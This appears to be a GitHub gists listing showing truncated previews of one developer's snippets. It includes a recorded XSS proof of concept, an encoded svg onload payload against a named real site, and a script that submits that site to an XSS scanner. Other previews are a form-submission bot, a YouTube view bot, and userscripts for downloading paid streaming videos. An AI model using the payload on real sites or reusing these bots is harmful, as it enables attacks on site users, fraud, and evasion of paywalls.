-
Introduction
- What is and why python
- Writing Python Code
- Understanding code flow
-
Python Fundamentals
- Variables
- Working with Strings
- Working with Numbers
- Type Conversion
| { | |
| "twitter": "twitter.com/drreygur", | |
| "linkedin": "linkedin.com/in/dreygur", | |
| "stackoverflow": "stackoverflow.com/users/7277428/dreygur" | |
| } |
| #!/usr/bin/env python3 | |
| import sys | |
| import random | |
| import string | |
| import requests | |
| # Change this value only | |
| form_id = '1FAIpQLSdFzC5XLmWejcrp8d8sgBK9GleYn6WZSeVi73Cqg3ERSZB9GA' | |
| url = 'https://docs.google.com/forms/d/e/' + form_id + '/formResponse' |
Introduction
Python Fundamentals
| #!/usr/bin/env python3 | |
| # -*- coding:utf-8 -*- | |
| ### | |
| # File: ytube_view_bot.py | |
| # Created: Tuesday, 7th January 2020 9:24:27 pm | |
| # Author: Rakibul Yeasin ([email protected]) | |
| # ----- | |
| # Last Modified: Tuesday, 7th January 2020 11:58:50 pm | |
| # Modified By: Rakibul Yeasin ([email protected]) | |
| # ----- |
| status | message | poc1 | poc2 | |
|---|---|---|---|---|
| 1 | Yay | https://unionleitor.top/busca?pesquisa=%3C%22%2F%2A%27%2F%2A%3E%3C%2FTitle%2F%3C%2FScript%2F--%3E%3Csvg%2F%2A%2A%2F%3B%20OnlOad%3D%28alert%29%281%29%2F%2F%3E#xssstar.pro | <a href="https://unionleitor.top/busca?pesquisa=%3C%22%2F%2A%27%2F%2A%3E%3C%2FTitle%2F%3C%2FScript%2F--%3E%3Csvg%2F%2A%2A%2F%3B%20OnlOad%3D%28alert%29%281%29%2F%2F%3E#xssstar.pro" target="_blank">https://unionleitor.top/busca?pesquisa=<"/*'/*></Title/</Script/--><svg/**/; OnlOad=(alert)(1)//>#xssstar.pro</a> |
| #usr/bin/python | |
| # -*- coding: utf-8 -*- | |
| import requests | |
| import json | |
| import csv | |
| url = 'https://hackersid.com/tool/doXSS?url=https://unionleitor.top/busca?pesquisa=' | |
| payload = { | |
| 'Host': 'hackersid.com', | |
| 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0', |
| #!/usr/bin/env python3 | |
| import sys | |
| import requests as rq | |
| from bs4 import BeautifulSoup | |
| url = "https://fanpagelist.com/category/celebrities" | |
| pagination = "/view/list/sort/fans/page" |
| #target illustrator | |
| // Modified by - Rakibul Yeasin | |
| if (app.documents.length > 0) { | |
| // continue if there's at leat one document open | |
| // start building User Interface | |
| var win = new Window("dialog", "Insert Page Numbers"); | |
| var panelMargins = win.add("panel", undefined, "Margins"); | |
| var lblMargins = panelMargins.add("statictext", undefined, "How far from the edge:"); | |
| var txtMargins = panelMargins.add("edittext", undefined, 0.25); |
| // ==UserScript== | |
| // @icon https://cdn1.iconfinder.com/data/icons/ninja-things-1/1772/ninja-simple-512.png | |
| // @name Hoichoi | |
| // @namespace http://rakibul.me | |
| // @version 0.0.2 | |
| // @description Hoichoi TV Downloader | |
| // | |
| // @author Rakibul Yeasin | |
| // @downloadURL https://github.com/dreygur/Hoichoi/raw/master/hoichoi.user.js | |
| // |
| // ==UserScript== | |
| // @name BioScope | |
| // @namespace htps://github.com/dreygur | |
| // @version 0.1 | |
| // @description Download BioScopLive Videos for Free! | |
| // @author Rakibul Yeasin | |
| // @match https://www.bioscopelive.com/* | |
| // @grant none | |
| // @require http://code.jquery.com/jquery-1.12.4.min.js | |
| // ==/UserScript== |